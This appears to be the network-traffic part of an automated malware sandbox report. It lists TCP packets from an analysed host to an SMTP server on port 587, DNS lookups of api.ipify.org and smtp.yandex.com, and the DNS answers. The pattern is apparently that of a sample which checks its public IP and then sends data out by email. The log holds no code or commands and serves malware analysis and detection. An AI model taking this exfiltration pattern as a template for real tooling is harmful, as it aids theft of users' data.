                                                                                                              Jan 11, 2025 09:27:25.173734903 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.173741102 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.173752069 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.173757076 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.173789024 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.173836946 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.173894882 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.173952103 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.179450989 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179464102 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179472923 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179514885 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.179560900 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.179600954 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179611921 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179621935 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179652929 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.179688931 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.179738998 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179791927 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.179845095 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179855108 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179866076 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179874897 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.179923058 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:25.186534882 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186548948 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186558962 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186640978 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186652899 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186754942 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186764956 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186773062 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186781883 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186877966 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186902046 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186911106 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186916113 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.186920881 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187031031 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187040091 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187048912 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187175989 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187186003 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187194109 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.187202930 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:25.249438047 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:26.101176977 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:26.258596897 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:27.998955965 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:28.003825903 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:28.211756945 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:28.211872101 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:28.211919069 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:28.212253094 CET50038587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:28.213999987 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:28.217082024 CET5875003877.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:28.218875885 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:28.218956947 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:28.855009079 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:28.861543894 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:28.866396904 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.085764885 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.086133003 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:29.090996981 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.310444117 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.310885906 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:29.315757036 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.537349939 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.537368059 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.537379026 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.537389994 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.537559032 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:29.537559032 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:29.542592049 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:29.547542095 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.767163992 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:29.775818110 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:29.780723095 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:30.000057936 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:30.086194992 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.184782982 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.185472012 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.189512014 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.190371037 CET5875003977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.190422058 CET50039587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.237426043 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.242247105 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.242321014 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.396226883 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.401065111 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.622433901 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.622571945 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.622668028 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.623043060 CET50037587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.623344898 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:34.627810001 CET5875003777.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.628109932 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:34.628171921 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.033241987 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.033478975 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.038239956 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.242974997 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.243159056 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.247941971 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.259954929 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.260090113 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.264843941 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.461033106 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.461252928 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.466073990 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.486675978 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.487108946 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.491929054 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.679372072 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.679780960 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.684552908 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.714930058 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.714951038 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.714963913 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.715003967 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.715086937 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.715097904 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.715135098 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.717245102 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.722167015 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899594069 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899637938 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899651051 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899696112 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.899755001 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.899755001 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.901602983 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.906450033 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.944278002 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:35.945163965 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:35.949878931 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.119801998 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.120870113 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.125590086 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.171619892 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.171840906 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.176589966 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.338740110 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.339303017 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.344166994 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.398482084 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.399064064 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.403886080 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.557415009 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.558576107 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.563379049 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.641566038 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.641820908 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.646620989 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.797991037 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.798954010 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.803746939 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.873913050 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:36.874135017 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:36.878873110 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.029911041 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.030195951 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.035912991 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.199681044 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.199887037 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.204749107 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.362030983 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.362499952 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.367273092 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.426527023 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.426915884 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.426953077 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.426970959 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.427011967 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.428159952 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.431765079 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.431776047 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.431787968 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.431829929 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.431900024 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.432003021 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.432997942 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433016062 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433046103 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433057070 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433065891 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433080912 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433104992 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433125973 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433128119 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433139086 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433186054 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.433216095 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433224916 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433235884 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.433281898 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.436589003 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.436650038 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.436816931 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.436867952 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.437856913 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.437907934 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438003063 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438014030 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438051939 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438064098 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438067913 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438113928 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438127041 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438190937 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438196898 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438242912 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438307047 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438325882 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438378096 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.438400030 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.438443899 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.441535950 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.441673040 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442662954 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442847013 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442886114 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.442955017 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443018913 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443073988 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443120956 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443213940 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443264961 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443348885 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443358898 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443459034 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443469048 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443478107 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443486929 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443502903 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443511963 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443639994 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443649054 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443659067 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443666935 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.443676949 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.580529928 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.580919981 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.580974102 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.580974102 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.581111908 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.582504988 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.585697889 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.585766077 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.585777044 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.585887909 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.586585045 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.587353945 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587363958 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587459087 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.587506056 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587517023 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587527990 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587537050 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587546110 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587560892 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587569952 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.587613106 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.591413975 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.591516972 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.591825962 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592204094 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592349052 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592494011 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592519045 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592536926 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592559099 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592588902 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592633009 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592633009 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.592694044 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592704058 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.592749119 CET50041587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:37.596647024 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.596822977 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597394943 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597470999 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597503901 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597560883 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597572088 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597624063 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597671986 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597709894 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597760916 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597795010 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597805023 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597842932 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597851038 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597871065 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597913980 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597923994 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597932100 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597948074 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597956896 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.597999096 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:37.598011017 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:38.096599102 CET5875004077.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:38.148715019 CET50040587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:27:38.548551083 CET5875004177.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:27:38.601857901 CET50041587192.168.2.477.88.21.158

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 09:23:26.502270937 CET5868553192.168.2.41.1.1.1
                                                                                                              Jan 11, 2025 09:23:26.509385109 CET53586851.1.1.1192.168.2.4
                                                                                                              Jan 11, 2025 09:23:28.064258099 CET6139953192.168.2.41.1.1.1
                                                                                                              Jan 11, 2025 09:23:28.163331985 CET53613991.1.1.1192.168.2.4

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 09:23:26.502270937 CET192.168.2.41.1.1.10xdde8Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 09:23:28.064258099 CET192.168.2.41.1.1.10xe479Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 09:23:26.509385109 CET1.1.1.1192.168.2.40xdde8No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 09:23:26.509385109 CET1.1.1.1192.168.2.40xdde8No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
